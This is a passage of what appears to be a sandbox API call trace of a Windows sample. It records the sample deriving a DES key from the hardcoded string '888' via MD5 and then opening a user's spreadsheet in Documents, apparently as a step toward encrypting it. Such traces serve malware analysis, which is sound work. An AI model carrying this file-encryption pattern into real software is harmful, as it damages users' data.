hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0220.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0220.271] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0220.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0220.271] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0220.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0220.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0220.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab860 | out: hHeap=0x2af0000) returned 1 [0220.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0220.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0220.271] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0220.271] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.271] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.271] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.271] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0220.271] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0220.271] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.281] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0220.281] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0220.281] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0220.281] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0220.281] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0220.281] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0220.281] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0220.281] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f7220, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0220.281] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0220.281] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f70a0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0220.281] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7c770) returned 1 [0220.282] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.282] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.282] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0220.282] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0220.282] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0220.282] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0220.282] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0220.282] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0220.282] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.282] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.282] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.282] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0220.282] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0220.282] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0220.283] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0220.283] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0220.283] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0220.283] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.283] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.283] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.283] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.283] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0220.283] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.283] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0220.283] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.283] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.283] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.283] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.283] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.283] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.283] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.283] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0220.283] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0220.283] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0220.283] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0220.283] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0220.283] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0220.284] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0220.284] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0220.284] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0220.284] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0220.284] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0220.284] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0220.284] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0220.284] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0220.284] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0220.284] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0220.284] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0220.284] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0220.284] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0220.284] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.284] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.284] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0220.284] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0220.284] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0220.284] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0220.284] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0220.287] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0220.287] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0220.287] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0220.287] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0220.287] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0220.287] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0220.287] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0220.288] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aabad0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0220.288] CryptCreateHash (in: hProv=0xa7c770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0220.288] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.288] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.288] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.288] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.288] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0220.288] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71f88, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0220.288] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0220.288] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.288] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0220.288] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71db8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0220.288] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.288] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0220.288] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0220.288] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0220.288] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0220.288] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0220.288] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0220.288] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0220.288] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aabc08, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0220.288] CryptHashData (hHash=0x9e1eb8, pbData=0x2a71ec8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0220.288] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.289] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.289] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.289] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0220.289] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0220.289] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0220.289] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0220.289] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0220.289] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0220.289] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0220.289] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0220.289] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0220.289] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0220.289] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0220.289] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0220.289] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aaba88, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0220.289] CryptDeriveKey (in: hProv=0xa7c770, Algid=0x6601, hBaseData=0x9e1eb8, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e1cb8) returned 1 [0220.289] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.289] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.289] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.289] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.289] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.289] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.289] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0220.290] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0220.290] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0220.290] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0220.290] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0220.290] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0220.290] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0220.290] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f7120, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0220.290] CryptDestroyHash (hHash=0x9e1eb8) returned 1 [0220.290] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.290] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.290] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.290] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.290] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.290] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/RRwZ.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\rrwz.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x524 [0220.291] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0220.291] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0220.291] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7140 [0220.291] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0220.291] HeapFree (in: 